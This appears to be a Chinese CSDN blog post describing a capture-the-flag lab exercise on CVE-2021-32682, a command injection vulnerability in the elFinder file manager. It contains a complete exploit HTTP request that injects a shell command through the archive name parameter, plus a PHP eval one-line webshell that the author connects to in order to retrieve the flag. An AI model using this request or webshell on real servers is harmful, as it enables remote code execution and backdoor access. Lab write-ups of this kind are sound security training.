春秋云镜 CVE-2021-32682

最新推荐文章于 2024-10-08 09:09:01 发布
最新推荐文章于 2024-10-08 09:09:01 发布
阅读量166 收藏 1
点赞数 1
分类专栏: 靶场 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_22002773/article/details/132004480
版权

春秋云镜 CVE-2021-32682 elFinder RCE

靶标介绍

elFinder是一套基于Drupal平台的、开源的AJAX文件管理器。该产品提供多文件上传、图像缩放等功能;elFinder 存在安全漏洞,攻击者可利用该漏洞在托管elFinder PHP连接器的服务器上执行任意代码和命令。

启动场景

在这里插入图片描述

漏洞利用

进入elfinder.html,创建一个普通的文本文件1.txt
在这里插入图片描述
右键这个文件,对其进行打包,打包后的文件命名为2.zip
在这里插入图片描述
POC

GET /php/connector.minimal.php?cmd=archive&name=-TvTT=id>shell.php%20%23%20a.zip&target=l1_Lw&targets%5B1%5D=l1_Mi56aXA&targets%5B0%5D=l1_MS50eHQ&type=application%2Fzip HTTP/1.1
Host: your-ip
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://localhost.lan:8080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

burp更改请求包,返回错误信息,
在这里插入图片描述
访问http://eci-2ze0uip18b0489vskvta.cloudeci1.ichunqiu.com/files/shell.php
id命令已执行
在这里插入图片描述
对木马进行url编码后上传,

echo '<?php @eval($_POST['cmd']);?>'

在这里插入图片描述

在这里插入图片描述
菜刀连接webshell http://eci-2ze0uip18b0489vskvta.cloudeci1.ichunqiu.com/files/shell.php
在这里插入图片描述
得到flag

flag{9449eed4-90d8-44f4-a99a-2dfdd1d7f6e9}

isbug0
关注
专栏目录
安全漏洞】CVE-2021-32682 elFinder RCE 简单分析
HBohan的博客
01-07 2803
elFinder 是一个开源的 web 文件管理器,使用 jQuery UI 用 Ja​​vaScript 编写。Creation 的灵感来自于 Mac OS X 操作系统中使用的 Finder 程序的简单性和便利性。
[春秋云镜]CVE-2021-32682
niubi707的博客
12-05 4665
春秋云镜CVE-2021-32682elFinder 是一个开源的 web 文件管理器,使用 jQuery UI 用 Ja​vaScript 编写。Creation 的灵感来自于 Mac OS X 操作系统中使用的 Finder 程序的简单性和便利性。 其低版本中存在命令注入
elfinder 命令注入 (CVE-2021-32682) 漏洞复现分析 | snort规则
weixin_68999845的博客
08-23 1003
这个标志组合的意思是,在创建或更新 ZIP 归档时,会先添加文件到归档中,然后立即运行测试来验证归档的完整性,并且在执行过程中显示详细信息,\1. 复现过程:https://www.cnblogs.com/NoCirc1e/p/16275613.html。下载地址:https://github.com/Studio-42/elFinder,下载完成后,重命名。\2. 源码下载url:https://github.com/Studio-42/elFinder。
CVE-2021-32682 elFinder ZIP 参数与任意命令注入漏洞复现
ierciyuan的博客
08-02 2538
CVE-2021-32682 elFinder ZIP 参数与任意命令注入漏洞复现。源码包+追踪分析。
elFinder(Web文件管理器)
08-17
elFinder是Web开源的文件管理器,用JavaScript写的usingjquery UI。创作灵感来自简单和Finder programused在Mac OS X操作系统方便。所有的操作与远程服务器上的文件和文件夹(复制,移动,上传,创建文件夹/文件,重命名等)
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
[春秋云镜]CVE-2022-26965 XStream Pluck-CMS-Pluck-4.7.16 后台RCE
b1n的博客
08-23 508
Pluck-CMS-Pluck-4.7.16 后台RCE。
CVE-2021-41773漏洞复现
dreamthe的博客
10-18 8008
1.安装debian系统 首先我选择的系统是debian10版本,也可以在别的系统完成复现,我想一个纯净版,所有重新安装了一个系统,安装步骤简单展示一下。 1.创建虚拟机,点击下一步。 导入镜像 自己选安装的位置以及虚拟机的名称。 安装过程需要设置管理员密码和新建一个用户,自己设置一下就可以了 这里选择了第二个。 因为之前我们选择了lvm,那么这里选择是就可以了 因为我们需要一个简单系统,所有只选择了下面三个安装软件 中间少的部分就是一直点击继续就可..
CVE-2021-21315漏洞复现-kali2020.4
weixin_43867542的博客
07-19 1385
漏洞名称:systeminformation 操作系统命令注入漏洞 等级危害:高危 CVSS评分:7.8 漏洞类型:操作系统命令注入 漏洞概述 systeminformation中存在操作系统命令注入漏洞,该漏洞源于外部输入数据构造操作系统可执行命令过程中,网络系统或产品未正确过滤其中的特殊字符、命令等。攻击者可利用该漏洞执行非法操作系统命令。 受影响版本 systeminformation < 5.3.1 环境概述 kali2020.4 漏洞复现 1.准备工作 ...
春秋云镜CVE-2022-0543
09-04
根据提供的引用内容,春秋云镜CVE-2022-0543指的是Apache Spark的命令注入漏洞(CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来...
CVE-2021-26084——Confluence OGNL 注入漏洞分析
战神/calmness的博客
09-04 2291
简述 2021年08月26日,Atlassian官方发布了Confluence OGNL 注入漏洞的风险通告,漏洞编号为CVE-2021-26084,漏洞等级:严重,漏洞评分:8.8。目前该漏洞安全补丁已更新。 Confluence是Atlassian公司的一个专业的企业知识管理与协同软件,也可以用于构建企业wiki,因此,Confluence的使用面很广。在某些情况下,未授权的攻击者可以构造特殊的请求,造成远程代码执行。 影响版本 组件
Windows本地提权漏洞(CVE-2021-1732)复现
玄道的网安博客
04-13 2183
漏洞概述 该漏洞由函数win32kfull!xxxCreateWi ndowEx 对应用层回调返回数据校验不严导致,本地用户执行漏洞利用程序获取系统权限。 影响版本 Windows Server, version 20H2 (Server Core Installation) Windows 10 Version 20H2 for ARM64-based Systems Windows 10 Version 20H2 for 32-bit Systems Windows 10 Versi..
CVE-2021-27928漏洞复现
wuuconix's blog
05-20 4212
CVE-2021-27928漏洞复现 漏洞简介:它是一个MariaDB的远程命令执行漏洞,存在于10.2.37之前的10.2版本,10.3.28之前的10.3版本,10.4.18之前的10.4版本以及10.5.9之前的10.5版本。 复现环境 攻击机:Ubuntu 20.04.2 LTS 目标机:mariadb/server:10.3.13 docker容器 复现准备 我们需要在我们的攻击机上安装 metasploit-framework 框架。安装步骤见Nightly Installers
Apache Druid (CVE-2021-25646)远程代码执行漏洞复现
ximo的博客
04-27 804
漏洞概述 Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。 Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以
Windows Print Spooler服务最新漏洞CVE-2021-34527详细分析
热门推荐
爱国小白帽
07-09 1万+
0x00 前言 近日,有安全研究员在github上公开了"CVE-2021-1675"的exp PrintNightmare,后经验证公开的exp是一个与CVE-2021-1675不同的漏洞,微软为其分配了新的编号CVE-2021-34527。这篇文章记录了CVE-2021-34527的复现过程,并对漏洞成因进行了简单的分析。 0x01 漏洞复现 这里记录域控环境下使用普通权限域账户实现RCE反弹nt authority\system shell的过程。下面的漏洞复现和漏洞分析都是基..
web安全】DolphinPHP RCE漏洞分析
HBohan的博客
04-07 3917
DolphinPHP DolphinPHP(海豚PHP)是一个基于ThinkPHP5.1.41LTS开发的一套开源PHP快速开发框架,DolphinPHP秉承极简、极速、极致的开发理念,为开发集成了基于数据-角色的权限管理机制,集成多种灵活快速构建工具,可方便快速扩展的模块、插件、钩子、数据包。统一了模块、插件、钩子、数据包之间的版本和依赖关系,进一步降低了代码和数据的冗余,以方便开发者快速构建自己的应用。 漏洞分析 看到application\common.php#action_log函数 观察到有
第四十一章 创建安全对话 - 使用 SecurityContextToken
最新发布
yaoxin521123的博客
10-08 413
做出响应后,客户端实例和服务实例可以访问相同的对称密钥。有关此密钥的信息包含在两个实例的。过期,安全对话就会结束,但 Web 客户端也可以通过取消未过期的。引用选项,则此步骤是必需的。否则,此步骤不是必需的。服务会在每次调用后自动清除安全标头。如果在下一步创建派生密钥令牌时使用。服务中不需要这样做,因为。请注意,此方法将客户端的。在这种情况下,必须指定。要结束安全对话,请调用。该方法返回一个状态值。属性设置为空字符串。
信息安全工程师(28)机房安全分析与防护
m0_73399576的博客
10-02 1221
信息安全工程师——机房安全分析与防护篇
如何安全地大规模部署 GenAI 应用程序
网络研究观
10-06 777
将生成式人工智能融入到你的商业模式中,既会带来新的风险,也会带来新的回报。以下是如何应对这些风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值